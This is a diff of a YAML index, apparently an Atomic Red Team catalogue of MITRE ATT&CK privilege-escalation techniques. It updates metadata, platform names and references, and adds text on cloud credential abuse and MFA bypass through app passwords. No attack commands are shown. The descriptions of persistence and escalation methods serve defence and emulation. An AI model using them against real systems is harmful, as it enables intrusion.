       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -32309,18 +32636,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -32352,9 +32679,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin privileges
@@ -32493,7 +32817,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests:
     - name: Create a new time provider
@@ -32572,7 +32895,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -32598,13 +32921,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -32725,12 +33046,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -32762,11 +33082,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -32807,11 +33126,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -32867,7 +33185,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests:
     - name: Access Token Manipulation
@@ -32901,7 +33218,7 @@ privilege-escalation:
         name: powershell
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -32958,7 +33275,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -33028,7 +33344,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests:
     - name: Winlogon Shell Key Persistence - PowerShell
@@ -33261,7 +33576,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -33315,7 +33629,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -33348,8 +33662,6 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests:
     - name: IFEO Add Debugger
@@ -33450,7 +33762,7 @@ privilege-escalation:
         elevation_required: true
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -33512,10 +33824,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -33573,7 +33884,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -33615,7 +33925,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -33674,8 +33984,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -33705,7 +34013,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -33740,12 +34048,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -33822,7 +34128,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests:
     - name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -33994,7 +34299,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -34043,8 +34348,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests:
     - name: Process Injection via C#
@@ -34163,7 +34466,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -34211,8 +34514,6 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests:
     - name: Create registry persistence via AppCert DLL
@@ -34257,7 +34558,7 @@ privilege-escalation:
         elevation_required: true
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -34270,16 +34571,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -34291,16 +34592,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -34355,7 +34656,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -34378,7 +34678,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -34422,8 +34722,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests:
     - name: Portable Executable Injection
@@ -34534,7 +34832,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -34562,8 +34860,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests:
     - name: Persistence by modifying Windows Terminal profile
@@ -34667,7 +34963,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests:
     - name: Named pipe client impersonation
@@ -34811,18 +35106,18 @@ privilege-escalation:
         elevation_required: true
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -34832,11 +35127,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -34847,12 +35146,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -34861,6 +35167,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -34869,13 +35176,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -34901,10 +35211,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -34913,10 +35231,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -34933,9 +35261,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -34999,7 +35324,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -35088,7 +35412,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests:
     - name: Persistence via WMI Event Subscription - CommandLineEventConsumer
@@ -35279,7 +35602,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -35304,7 +35627,6 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests:
     - name: Parent PID Spoofing using PowerShell
@@ -35498,7 +35820,7 @@ privilege-escalation:
         name: powershell
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -35524,7 +35846,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -35538,7 +35859,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -35565,8 +35885,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -35577,7 +35897,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests:
     - name: Change Default File Association
@@ -35677,7 +35998,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -35704,7 +36025,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -35744,7 +36064,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
